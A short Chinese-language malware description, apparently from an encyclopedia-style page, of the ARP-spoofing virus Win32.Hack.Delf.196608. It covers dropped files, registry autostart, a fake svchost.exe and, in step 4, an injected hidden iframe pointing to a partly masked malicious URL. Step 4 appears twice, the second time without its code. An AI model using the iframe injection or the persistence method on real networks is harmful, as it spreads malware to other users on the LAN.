這是一個ARP病毒。只要中了該病毒,在區域網路內的機器打開瀏覽器瀏覽網頁時,毒霸會一直報病毒。
基本介紹
- 中文名:ARP欺騙196608
- 隸屬:病毒
- 病毒別名:Win32.Hack.Delf.196608
- 影響系統::Win9x WinMe WinNT Win2000
Win32.Hack.Delf.196608
病毒名稱(中文):
ARP欺騙196608病毒別名:
威脅級別:
★★☆☆☆病毒類型:
網頁病毒病毒長度:
196608影響系統:
Win9x WinMe WinNT Win2000 WinXP Win2003
利用傳送數據包時嵌入帶病毒的HTML代碼,訪問惡意網址下載惡意病毒。
1. 病毒運行後,首先釋放以下病毒檔案
%Systemroot%system32\Packet.dll
%Systemroot%system32\wpcap.dll
%Systemroot%system32\WanPacket.dll
%Systemroot%system32\Drivers\npf.sys
2. 創建自啟動
在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下
創建 KVP 項,啟動參數為: C:\WINDOWS\system32\drivers\svchost.exe
3. 該病毒會將自身複製到 %Systemroot%system32\Drivers\svchost.exe.
並運行 %Systemroot%system32\Drivers\svchost.exe, 之後又把 scvhost.exe
(注: 與 svchost.exe 區分開來),釋放到%Systemroot%system32\Drivers 目錄下.
4. 往同一網關內的所有 IP 的數據包內插入以下 HTML 代碼:
iframe src='http://www.z****0.com/0.htm' width=0 height=0
使區域網路其它用戶訪問其惡意網址.
4. 往同一網關內的所有 IP 的數據包內插入以下 HTML 代碼:
使區域網路其它用戶訪問其惡意網址.
